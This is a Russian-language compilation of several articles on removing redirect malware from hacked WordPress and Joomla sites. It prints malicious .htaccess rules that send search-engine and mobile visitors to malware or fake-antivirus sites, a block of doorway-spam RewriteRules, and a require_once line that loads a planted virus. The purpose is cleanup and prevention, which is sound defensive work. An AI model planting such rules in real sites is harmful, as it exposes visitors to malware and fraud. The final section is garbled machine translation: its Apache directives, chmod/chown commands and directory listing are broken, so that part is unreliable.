Вирусдай позволяет удалить вирус-редирект с вашего сайта. Редирект – это перенаправление пользователя на сторонний сайт при попытке просмотра страниц исходного сайта. Обычно такие редиректы перенаправляют пользователей на сайты, откуда происходит распространение вредоносного или мошеннического ПО (например, под видом обновления к веб-браузеру). Загрузка и установка таких программ может привести к заражению компьютера или вашего мобильного устройства.
В большинстве случаев, вредоносный код прописывается в файле.htaccess, лежащем в корне вашего сайта. Вредоносный код, часто выглядит следующим образом:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*
RewriteCond %{HTTP_REFERER} .*google.*
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://maliciouswebsite.net/index.php?t=6
Такие правила редиректа будут перенаправлять пользователей с поисковых систем Яндекс, Гугл и Бинг на сайт maliciouswebsite.net.
Часто распространены мобильные редиректы, влияющие только на пользователей, посещающих ваш ресурс с мобильных устройств.
Лечение от вируса
Мы рекомендуем воспользоваться сервисом Вирусдай, умеющим автоматически находить и удалять вредоносные редиректы. Если вы хотите произвести удаление вручную — инструкции следующие:
1. Установите соединение со своим сайтом через файл-менеджер по FTP
2. Найдите файл.htaccess в корневом каталоге сайта
3. Удалите вредоносный код и сохраните файл
Теперь, когда редирект удален, вы, казалось бы, можете вздохнуть спокойно, однако, вы не знаете как и кем он был помещен в ваш файл и уж точно не знаете повторится ли это снова, однако, вы явно подозреваете, что да. Осталось постараться найти уязвимость, через которую лоумышленникам удалось проникнуть в файлы вашего сайта. Вирусдай может находить и уничтожать шеллы, дающие злоумышленникам полный доступ к вашим файлам.
Вирус редирект в PHP-файлах
Есть разновидности редиректов, которые любят прописываться не только в самом файле.htaccess, но также, легко позволяют себе прописаться во множестве (сотни или тысячи файлов) PHP файлов. В явном виде вы не сможете обнаружить такую вредоносную строку в файлах, однако, при запуске любого из PHP файлов редирект на вашем сайте будет снова возникать. Для полного устранения вирусда редиректа рекомендуем использовать сервис Вирусдай. Вирусдай обнаруживает и удаляет редиректы в.htaccess и файлах *.php.
Всем привет. Это небольшая статья будет посвящена защите вашего блога WordPress от вирусов и троянов таких как Мобильный редирект , он же JS:Redirector-MC . Его можно обнаружить с помощью антивируса AVAST и браузера OPERA, другие антивирусы пока его не видят, повторюсь пока не видят.
Если Вы заметили данный вирус на своем блоге, без паники здесь ничего страшного нет, сейчас я научу Вас как бороться с этим недугом. При заходе на сайт под браузером Opera вы увидели окошко «троян блокирован», заражение «JS:Redirector-MC » это и есть наш мобильный редирект.
Бороться с ним будем следующим образом.
Открываете файл functions.php и в самом внизу вы можете обнаружить следующий код:
Наша задача удалить этот код.
Сделать это можно несколькими способами:
- Удалить код вручную.
- Найти копию файла functions.php и перезалить на хостинге
После того как вы удалите этот код, проверяем наш блог на специальных онлайн сервисах, нет ли еще зараз на блоге.
У Вас наверно возникают вопросы откуда взялся данный вирус. Я покопался по интернету и нашел ответ, который не очень меня обрадовал скидываю, как скрин.
Из — прочитанного можно сделать вывод что ни наш WordPress не сервис не защищен на 100% .
Я поймал этот вирус на 2-х блогах, советую проверить свои блоги на наличии вирусов, особенно те которые находятся на хостинге Timeweb.
Если вовремя не обнаружить вирус, Ваш блог может быстро упасть в позициях, будет большой процент отказов, вообщем ничего хорошего Вас не ожидает.
После удаления вируса, советую:
- ОбновитьWordPress
- Изменить пароль к Ftp
- Изменить пароль на хостинге
- Сделать полный скан компьютера на наличие вирусов
Если ваш блог взломал, об этом я уже писал . Самое главное вовремя заметить и обезвредить. Если что не получается или не понятно, обращайтесь помогу.
Никакой владелец сайта не захочет, чтобы траффик с его сайта уходил через редирект к неизвестным сайтам - это неинтересно как клиентам, подрывает доверие покупателей и вызывает санкции поисковых систем и антивирусов.
В данной статье я рассмотрю основные варианты встраивания вирусных редиректов.
Внимание! Удаляя редирект, Вы удаляете лишь следстствие, для того, чтобы ситуация не повторилась, Вам стоит искать причину попадания вирусов на сайт!
Кроме этого, вредоносные редиректы плохо детектируются сканерами и антивирусами, что зачастую приходится искать вручную источник зла.
В первую очередь ищем вставки кода в файлы .htaccess , особенно в корне сайта
Все что связано с Rewrite стоит проверить, куда перенаправляет.
Ниже я приведу пару вредоносных вставок - которые создают дорвеи и тысячи страниц в поиске, так называемый японский спам (сео-спам, страницы с иероглифами - тут много названий):
RewriteRule ^([^\d\/]+)-(+)-(+)%(.*)+%+%([^\d\/]+)+%(.*)+%+%([^\d\/]+)+%(.*)+%+%([^\d\/]+)([^\d\/]+)%(.*)+%+%+%(.*)+%+%(.*)F%(.*)+%(.*)+%([^\d\/]+)(+)%(.*)+%+%+%+%(.*)+%(.*)+%([^\d\/]+)+%(.*)+%+%+%(.*)+%+%+%(.*)+%(.*)+%+%(.*)+%([^\d\/]+)(.*)%(.*)+%(.*)+%(.*)(.*)%([^\d\/]+)F%(.*)+%+%([^\d\/]+)+%(.*)+%+%+(+)%(.*)+%+%(.*)(.*)%(.*)+%+%([^\d\/]+)+%(.*)+%+%(.*)([^\d\/]+)%(.*)+%(.*)+%(.*)(+)%(.*)+%(.*)(.*)%+(.*)%(.*)+%+F%(.*)F%(.*)+%+%([^\d\/]+)(+)%(.*)+%+%(.*)([^\d\/]+)%+\/.*..*$ ?$65$39=$62&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(.*)+%+%+.*-S.*-.*-F.*-([^\d\/]+).*-+..*$ ?$7$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(+)+%+([^\d\/]+)+%+(+)+%+([^\d\/]+)+%+(+)+%+([^\d\/]+)+%+(+)+%+([^\d\/]+)(+)%+(+)+%+%+(+)+%+([^\d\/]+)-.*-+..*$ ?$15$1=$14&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)-+.*+..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+).*HM+L.*+.*+N.*+YW.*+.*+.*(+)+.*+F.*W+.*+.*F+ZW.*HR.*(.*)--$ ?$2$10=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+).*+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+).*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+).*(+).*L+N.*YXJ.*HJ.*WF.*+.*Y+.*(.*).*R.*Y.*V.*+Q.*$ ?$2$1=$4&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+).*(+).*L+.*+.*+YW.*+.*+.*(+)+-$ ?$2$8=$4&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-.*-.*-.*%+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+).*HM+L.*+.*F+ZW.*WF.*+.*Y+.*(.*).*ZG+.*ZXN+.*WN.*ZH(.*).*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+)+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+)+%+%(+)+%+([^\d\/]+)$ ?$36$1=$35&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*+$ ?$1$3=$4&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-.*-.*-.*-.*%+F$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-+-.*-.*-.*-.*-.*%+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)_+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/.*-.*-+-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/+.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(.*)+%+%+-.*+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)-.*-V.*%+(.*)+%+%+.*-S.*+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/.*-.*-+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)-+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)..*&.*=.*\:\/.*-+..*\/.*-.*-.*-.*-.*-.*\/&.*=+K([^\d\/]+)&.*=%(+)+%(.*)+%(+)+%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)(.*)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)++%(+)+%++%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)F%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+&.*=+&.*=+&.*=+&.*=.*\:\/.*+..*..*..*\/.*\?.*=OIP.(.*).*U.*+.*(+).*U.*+.*+V+.*Q(.*).*(+).*&.*=+.+&.*=+&.*=+&.*=+&.*=+&.*=+&.*=%(+)+%(.*)+%(+)+%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)(.*)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)++%(+)+%++%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)F%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+&.*=+.*+.*&.*=+.*+.*&.*=+.*+.*&.*=+.*+.*+.*&.*=+.*+.*+.*$ ?$148$146=$147&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+([^\d\/]+)&.*=+&.*=+$ ?$11$1=$10&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%.*%.*+%+%.*+%.*%.*+%.*+%.*+%.*%.*+%.*+%.*+%+%.*+%.*%.*+%+.*%.*+%.*+-%.*+%+%.*+%.*+%.*+%+%.*+%.*+%.*+%.*%.*+%+%.*+%+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%.*%.*+%.*%.*+%.*+%.*+%.*%.*+%+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)\/.*-.*\/+\/.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+)+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+)+%+%(+)+%+([^\d\/]+)\/.*\/+\/$ ?$36$1=$35&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*+\/$ ?$1$3=$4&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)F%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)(+)&.*=-+&.*=-+$ ?$49$38=$50&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/.*-.*-.*-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/.*+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)F%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)(+)&.*=-+&.*=-+$ ?$49$38=$50&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/+.*+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%.*%.*+%+%.*+%.*%.*+%.*+%.*+%.*%.*+%.*+%.*+%+%.*+%.*%.*+%+.*%.*+%.*+-%.*+%+%.*+%.*+%.*+%+%.*+%.*+%.*+%.*%.*+%+%.*+%+.*\/.*\/+\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)&.*=-+$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)&.*=+$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*\/$ ?$1$3=$4&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)(.*)+%+%+.*-S.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%([^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+)+%+([^\d\/]+)\/$ ?$15$1=$14&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+)+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+)+%+%(+)+%+([^\d\/]+)\/$ ?$36$1=$35&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^(+)\/([^\d\/]+)(+)$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)-+\/$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)-.*\/\?.*=+$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-(+)-(+)-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]
Если увидите что-то подобное - смело можно удалять, если сомневаетесь, какие строки можно оставить, то возьмите стандартный файл вашей CMS - там не будет находиться вирус!
Обычно редиректы прописывают для запросов с мобильных и планшетов:
android|plucker|pocket|psp|symbian|treo|vodafone|wap и другие вариации мобильных заголовков
как и для переходов с поисковых систем:
yandex|google|mail|rambler|vk.com
Если этот пункт не помог, то стоит обратить внимание на код страницы - порой часто редирект добавляют через Javascript
Чтобы избавиться от вредоносного кода может понадобиться массовая замена всех .js файлов.
Обязательно проверяйте индексные файлы и папку шаблона - это излюбленные места хакеров для вирусов. Особенно тщательно пройдитесь по файлам index.php, footer.php, head.php, header.php - в последнее время популярно стало размещать сами вирусы не в них, а в виде ссылок. Поэтому внимательно проверяйте, какие файлы подгружаются посредством команд include и require .
Самые изощренные вставки делаются уже в подгружаемые модули, плагины и компоненты. Это могут быть как отдельно внедренные модули (особенно если была взломана админка), так и просто вставки зашифрованного кода в файлы известных и популярных расширений.
К примеру, в последнее время встречаю не один сайт на джумле (в частности на Joomla 2.5 ), где по пути includes/inc.class.php находится сам вирус, а в файл application.php в этой же папке вставлена следующая строка
require_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");
Обычно параллельно с этим libraries/joomla/appplication находится вирус редиректа с именем joomla-app.php
В любом случае, если заметили на сайте перенаправление на сторонний сайт, то обязательно стоит предпринять меры безопасности и проверять весь сайт. Если сами не можете справитья, то обязательно стоит обратиться к специалистам по удалению вирусов и защите сайтов.
В прошлый понедельник закончилась моя полугодовая эпопея борьбы с вредоносным мобильным редиректом, обнаруженным Яндексом на двух моих проектах.
(Вот моя история в двух частях…)
Картинка отсюда: http://rebill.me/showthread.php?t=1804
там еще много других картинок и слов о вредоносном мобильном редиректе.
В одно далеко не прекрасное утро я получила вот такое письмо от Яндекс.Вебмастер :
Здравствуйте, ***!
На страницах вашего сайта **** обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.
Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.—
С уважением,
Яндекс.Вебмастер
http://webmaster.yandex.ru
Я не сразу смогла поверить, что на моем проекте существует вредоносный код, гораздо легче было считать, что это Яндекс со своим поведенческим (бихевиористским) алгоритмом ошибся и возвел напраслину на мой набирающий популярность проект… Почитав внимательнее информацию на вкладке “Безопасность”, посмотрев какие комментарии выдает Яндекс при моей попытке перейти с результатов поиска на мой зараженный сайт я поняла, что речь идет о вредоносном мобильном редиректе
.
Стала экспериментировать на мобильных устройствах: с поисковой системы Google зашла на главную страницу своего сайт, перешла на страницу с контентом и … была перенаправлена на какой-то невнятный сайт с адресом типа aloobe.com с единственной кнопкой “НЕОБХОДИМО СРОЧНО ОБНОВИТЬ Adobe Player” – это стало доказательством, что Яндекс был прав, а неправа была я…
Бог знает, чего мне стоила борьба с этим вредоносным мобильным редиректом, борьба за чистоту своих проектов… Перечитаны горы литературы, удалены виджеты и плагины, сменены темы, в порыве отчаяния я даже поменяла хостера, проверенного годами, поиски вредоносного редиректа велись как внутри Базы Данных, так и в фолдерах обслуживающих проекты.
В конечном итоге все оказалось до смешного просто, но об этом я расскажу вам в следующем материале, а сегодня я расскажу вам о плагине, который закрыл собою брешь. Я отправила сайт на перепроверку, Яндек перестал помечать мой сайт как зараженный, вернулись читатели и больше этой проблемы на моих проектах не было! Вернее, проблема оставалась (потому что поиски её решения у меня заняли полгода), но она была изолирована от моих читателей и уже никто из посетителей моих сайтов не мог попасть в лапы к жуликам.
Плагин называется Verve Mobile
. На этом я собиралась дать ссылку на плагин и завершить пост, но от этого плагина на wordpress.org осталось одно обсуждение:
http://wordpress.org/support/plugin/verve-mobile-plugin .
Чтобы достойно закончить эту статью, я сохранила этот популярный плагин . Вы можете скачать его . Конечно, я не смогу обеспечить его поддержку, но у меня на проектах он работает без проблем, распознавая мобильные устройства и отдавая им контент сайта в специальном шаблоне “для просмотра с мобильных устройств”.
Единственный обнаруженный мной недостаток плагина, при активированном плагине я не могла . Этот недостаток я обошла дективируя Verve Mobile на несколько минут, которые нужны для авторизации с применением OpenId.
PS Прежде чем устанавливать плагин убедитесь, что .htaccess файл расположенный в корневой директории вашего сайта содержит помимо записе WordPress’а:
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
только то что вы туда по каким-то причинам вписали самостоятельно и ничего лишнего и необъяснимого.
Если вы нашли в файле.htaccess какие-то сомнительные перенаправления, уберите из него все лишнее – это скорее всего станет решением проблемы вредоносного мобильного ридеректа. Будьте внимательны и прокрутите файл.htaccess до конца, иногда злоумышленники добавляют туда ОЧЕНЬ МНОГО пустых строк, чтобы их код переадресации не был виден на первой странице.
Продолжение следует…
Новая форма вируса которые видят, что не знаю, очень сильно влияет на сайты, размещенные на ненадежным серверам , где пользователи счета / субсчета могут "видеть" друг друга. В частности, хостинг-аккаунтов сделаны все в папку "виртуальные хосты "Написание и право папки пользователя "виртуальных доменов" дано общее пользователя... реселлера в большинстве ситуаций. Это метод, который не использует типичный веб-серверов WHM / CPanel .
Действие.htaccess - .htaccess Hack
Вирус влияет файлов .htaccess жертвы сайта. Линии добавлены / Директивы к перенаправлять посетителей (Исходя из Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace, и т.д. сайтов и порталов с высокой посещаемостью) к некоторым сайтам, которые предлагают "антивирус . «Это фальшивый антивирус , О котором я писал в предисловии к .
Вот что это выглядит как .htaccess пострадавших: (Не получить доступ к линиям содержание ссылок ниже )
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond% {HTTP_REFERER}. * Яндекс. * $
RewriteCond% {HTTP_REFERER}. * Одноклассники. * $
RewriteCond% {HTTP_REFERER}. * Вконтакте. * $
RewriteCond% {HTTP_REFERER}. * Rambler. * $
RewriteCond% {HTTP_REFERER}. * Tube. * $
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $
RewriteCond% {HTTP_REFERER}. * Blogger. * $
RewriteCond% {HTTP_REFERER}. * Baidu. * $
RewriteCond% {HTTP_REFERER}. * Qq.com. * $
RewriteCond% {HTTP_REFERER}. * Myspace. * $
RewriteCond% {HTTP_REFERER}. * Twitter. * $
RewriteCond% {HTTP_REFERER}. * Facebook. * $
RewriteCond% {HTTP_REFERER}. * Google. * $
RewriteCond% {HTTP_REFERER}. * Live. * $
RewriteCond% {HTTP_REFERER}. * AOL. * $
RewriteCond% {HTTP_REFERER}. * Bing. * $
RewriteCond% {HTTP_REFERER}. * Amazon. * $
RewriteCond% {HTTP_REFERER}. * Ebay. * $
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $
RewriteCond% {HTTP_REFERER}. * Flickr. * $
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $
RewriteCond% {HTTP_REFERER}. * Сосо. * $
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $
RewriteCond% {HTTP_REFERER}. * Pornhub. * $
RewriteCond% {HTTP_REFERER}. * Orkut. * $
RewriteCond% {HTTP_REFERER}. * Живой журнал. * $
RewriteCond% {HTTP_REFERER}. * Wordpress. * $
RewriteCond% {HTTP_REFERER}. * Yahoo. * $
RewriteCond% {HTTP_REFERER}. * Ask. * $
RewriteCond% {HTTP_REFERER}. * Excite. * $
RewriteCond% {HTTP_REFERER}. * Altavista. * $
RewriteCond% {HTTP_REFERER}. * MSN. * $
RewriteCond% {HTTP_REFERER}. * Netscape. * $
RewriteCond% {HTTP_REFERER}. * Hotbot. * $
RewriteCond% {HTTP_REFERER}. * Goto. * $
RewriteCond% {HTTP_REFERER}. * Infoseek. * $
RewriteCond% {HTTP_REFERER}. * Мама. * $
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $
RewriteCond% {HTTP_REFERER}. * Lycos. * $
RewriteCond% {HTTP_REFERER}. * Поиск. * $
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $
RewriteCond% {HTTP_REFERER}. * Mail. * $
RewriteCond% {HTTP_REFERER}. * Dogpile. * $
RewriteRule. *RewriteCond% {} REQUEST_FILENAME!-Е
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond% {} * REQUEST_FILENAME Jpg $ |!. *. Gif $ | *. Png $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. *
Те, кто использует WordPress будет найти эти строки в файле .htaccess от public_html . Кроме того, вирус создает. Htaccess файл в той же папке WP-содержание .
*Есть также ситуации, в которых вместо появляется peoriavascularsurgery.com dns.thesoulfoodcafe.com или другим адресам.
Что делает этот вирус.
После перенаправлены, посетители встречают с распростертыми объятиями сообщение:
Внимание!
Компьютер содержит различные признаки присутствия вирусов и вредоносных программ. Ваша система защиты от вирусов требует немедленной проверки!
Система безопасности будет выполнять быстрое и бесплатное сканирование компьютера на наличие вирусов и вредоносных программ.
Независимо от того, какая кнопка нажата, мы взяты на страницу "Мой компьютер "Создан, чтобы имитировать XP дизайна . Это автоматически начинается "сканирование" в конце которого мы находим, что «заразился».
После нажатия кнопки ОК или Отмена, он начнет скачать
Файлов setup.exe
. Это setup.exe является поддельной антивирусной
влияющие на систему. Установка некоторых вредоносного ПО распространяться дальше ссылки скомпрометированы, и к тому же эти антивирусное программное обеспечение
(все ложные), что жертву предлагается купить.
Те, кто уже связался с вирусом могут использовать эту форму . Кроме того, рекомендуется сканировать весь жесткий диск. Рекомендовать Kaspersky Internet Security
или Kaspersky Anti-Вирус
.
Этот тип вируса поражает посетителя системы OS операционная Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 и окна 95. На сегодняшний день нет известных случаев заражения операционных систем Windows Vista и Windows, 7.
Как мы можем устранить этот вирус. Htaccess файл на сервер и как предотвратить инфекцию.
1. Анализ подозрительных файлов и стирание кодов. Чтобы убедиться, что файл не коснулось только .htaccess Вы должны проанализировать все файлы .php si . Js .
2. Перепишите файл. Htaccess и установите CHMOD 644 или 744 с доступом на запись только владельцем пользователя .
3. При создании учетной записи хостинга для веб-сайта в папку / Главная или / Webroot Это позволит автоматически создавать папки, которая часто имеет имя пользователя (пользователю для Cpanel, FTP И т.д.). Для предотвращения записи данных и передача вируса от одного пользователя к другому, рекомендуется, чтобы каждый пользователь папке должен быть установлен:
CHMOD 644 или 744, 755 - показана 644.
Чаун-R nume_user nume_folder.
CHGRP-R nume_user nume_folder
LS-все способы проверки, если они были сделаны правильно. Должно появиться что-то вроде этого:
Динамика динамического динамика drwx-x-x 12 4096 Май 6 14: динамика 51 /
drwx-x-x 10 duran duran 4096 Мар 7 07: 46 duran /
drwx-x-x 12 Tube Test Tube 4096 Jan 29 11: 23 Tube /
drwxr-xr-x 14 Express 4096 Feb 26 2009 express /
drwxr-xr-x 9 ezo ezo 4096 May 19 01: 09 ezo /
drwx-x-x 9 farm 4096 farm 19 22: 29 farm /
Если одно из выше userele FTP Зараженные файлы Она не может отправить вирус другим пользователем хоста. Минимальная мера безопасности для защиты счетов размещенных на веб-сервере.
Общие элементы районах, пострадавших от этого вируса.
Все районы, пострадавшие перенаправлять посетителей на сайты по доменному имени, содержащие "/main.php? е = 4 & ч ".
